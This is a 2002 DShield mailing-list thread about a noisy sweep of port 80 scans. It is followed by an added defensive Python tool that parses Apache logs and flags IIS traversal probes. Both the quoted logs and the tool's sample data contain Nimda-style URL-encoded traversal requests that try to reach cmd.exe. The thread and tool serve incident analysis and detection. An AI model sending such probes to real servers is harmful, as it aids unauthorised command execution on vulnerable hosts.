[Dshield] nimda-like scanning?

Jim Tagart Jim.Tagart at bellcold.com
Tue Mar 26 22:04:12 GMT 2002


I just ran a summary report and I'm seeing more port 80 scanning than normal.

Out of 20389 total Events, 278 Events were Rejected, 1.36% 
Of the 278 Events Rejected;
Restricted port attempts --------------------- 27 	9.71%	
Port scans --------------------- 14 	5.04%	
Broadcast/ Multicast queries --------------------- 	0.00%	
Port 80/ Web exploit attempts --------------------- 234 	84.17%	
Other traffic dropped/ blocked --------------------- 3 	1.08%	

RapTag is provided courtesy Tagart engineering
<http://www.tagartengineering.com> Please send your log reports to
Dshield.org <http://www.dshield.org>

Normally port 80 only accounts for ~40% of our dropped packets.
We get scanned by Nimda-type things daily.  Here's yesterday's summary:

Out of 22193 total Events, 359 Events were Rejected, 1.62% 
Of the 359 Events Rejected;
Restricted port attempts --------------------- 50 	13.93%	
Port scans --------------------- 132 	36.77%	
Broadcast/ Multicast queries --------------------- 3 	0.84%	
Port 80/ Web exploit attempts --------------------- 160 	44.57%	
Suspect ICMP traffic --------------------- 	0.00%	
Other traffic dropped/ blocked --------------------- 14 	3.90%	


In my firewall logs we see lots of things like the following daily. If time
permits I try and contact the 'infected' machine's caretaker; so far I've got
about a 30% success rate. Soon I'll be setting up a tarpit for those lucky
machines that get infected, can't wait to do that actually....

op=GET arg=http://www/d/winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34
op=GET arg=http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir result="400 Bad Request" proto=http rule=34
op=GET arg=http://www/d/winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34
op=GET arg=http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found"


> -----Original Message-----
> From:	Kelly Martin [SMTP:kellym at fb00.fb.org]
> Sent:	Tuesday, March 26, 2002 1:02 PM
> To:	'list at dshield.org'
> Subject:	[Dshield] nimda-like scanning?
> 
> Just noticed the following in my system logs.
> 
> First, a segment of an Apache log on one of our web servers:
> 
> 80.128.246.185 - - [26/Mar/2002:13:59:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 243
> 80.128.246.185 - - [26/Mar/2002:13:59:03 -0600] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 246
> 80.128.246.185 - - [26/Mar/2002:13:59:07 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 243
> 80.128.246.185 - - [26/Mar/2002:13:59:07 -0600] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 246
> 80.128.246.185 - - [26/Mar/2002:13:59:08 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 243
> 80.128.246.185 - - [26/Mar/2002:13:59:08 -0600] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 246
> 
> Second, the output of my portscan detector (which works by parsing my PIX's
> deny log):
> 
> Tue Mar 26 13:59:28 2002 scanning complete from 80.128.246.185, 5067 hits in
> 104 seconds (471 hosts, 1 ports [TCP:80])
> 
> The IP belongs to t-dialin.net, which is probably only second to wanadoo.fr
> in proportion of native scriptkiddies.
> 
> Judging by these numbers, I'd say both of my Class C's were scanned rather
> noisily (5067 hits in 104 seconds?) for vulnerable IIS servers.
> 
> Anyone else seen this sweep across them?
> 
> Kelly
> 
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list
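The requests quoted in both messages are the IIS Unicode (%c0%af) and double-decode (%252e, %255c, %%35%63) traversal probes that Nimda and Code Red II left behind, all aiming at winnt/system32/cmd.exe. The following is an added example, not code from either poster or from DShield: a small Apache access-log scanner that decodes a request URI the way the vulnerable IIS did (repeated percent-decoding, then the overlong UTF-8 forms of '/' and '\'), resolves the path, and flags any request that climbs above the web root or resolves to cmd.exe, then summarises the flagged hits per source IP with their time span, in the spirit of the portscan detector's "N hits in M seconds" line. The log lines, IP addresses and sizes in SAMPLE_LOG are constructed for this illustration; the IIS decoding order is a simplification based on the public descriptions of those two bugs, not a reimplementation of IIS.

```python
"""Flag IIS Unicode / double-decode traversal probes in Apache access logs (defensive example)."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_to_bytes

# Constructed sample lines in Apache common-log format, modelled on the thread's
# examples; the addresses, sizes and the two benign lines are made up.
SAMPLE_LOG = """\
192.0.2.77 - - [26/Mar/2002:13:59:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.1" 404 243
192.0.2.77 - - [26/Mar/2002:13:59:03 -0600] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.1" 404 246
192.0.2.77 - - [26/Mar/2002:13:59:07 -0600] "GET /_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 243
192.0.2.77 - - [26/Mar/2002:13:59:08 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226
198.51.100.9 - - [26/Mar/2002:14:02:11 -0600] "GET /index.html HTTP/1.1" 200 1043
198.51.100.9 - - [26/Mar/2002:14:02:12 -0600] "GET /images/..%2Flogo.png HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Overlong UTF-8 encodings of '/' and '\' that the IIS 4/5 Unicode bug accepted.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}


def decode_like_iis(raw: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (so %252e -> %2e -> '.', and %%35%63 -> %5c -> '\\'),
    then map the overlong UTF-8 slashes. This is a simplified model, not IIS itself."""
    data = raw.encode("latin-1")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for overlong, plain in OVERLONG.items():
        data = data.replace(overlong, plain)
    return data.decode("latin-1")


def normalise_path(decoded: str):
    """Resolve '.' and '..' segments; return (escaped_root, resolved_path).
    Backslashes count as separators, as they do on Windows."""
    path = decoded.split("?", 1)[0].replace("\\", "/")
    parts, escaped = [], False
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            else:
                escaped = True  # climbed above the web root
            continue
        parts.append(seg)
    return escaped, "/" + "/".join(parts)


def parse_line(line: str):
    """Parse one access-log line and attach the decoded path and verdict; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["decoded"] = decode_like_iis(rec["uri"])
    rec["escapes_root"], rec["resolved"] = normalise_path(rec["decoded"])
    rec["targets_shell"] = rec["resolved"].lower().endswith("/cmd.exe")
    rec["suspicious"] = rec["escapes_root"] or rec["targets_shell"]
    return rec


def summarise(lines):
    """Per-source summary of suspicious requests: hit count, time span in seconds, and any
    non-4xx status codes (a 2xx answer to one of these probes deserves a closer look)."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["suspicious"]:
            by_ip[rec["ip"]].append(rec)
    summary = {}
    for ip, recs in by_ip.items():
        times = [r["time"] for r in recs]
        summary[ip] = {
            "hits": len(recs),
            "seconds": int((max(times) - min(times)).total_seconds()),
            "non_4xx": sorted({r["status"] for r in recs if not r["status"].startswith("4")}),
        }
    return summary


if __name__ == "__main__":
    for ip, s in summarise(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {s['hits']} hits in {s['seconds']} s, non-4xx statuses: {s['non_4xx']}")
```

Run it against a real access log with `summarise(open("access_log").read().splitlines())`. The decoding step matters more than the cmd.exe string match: a naive `grep cmd.exe` catches these particular probes, but the same traversal with the file name also encoded would slip past it, while the resolved-path check still sees a request leaving the web root. On an Apache server the probes are noise (they return 404, as in both posters' logs); the value of the summary is spotting a source that sweeps the whole range in seconds, which is the pattern worth reporting to DShield or to the source network's contact.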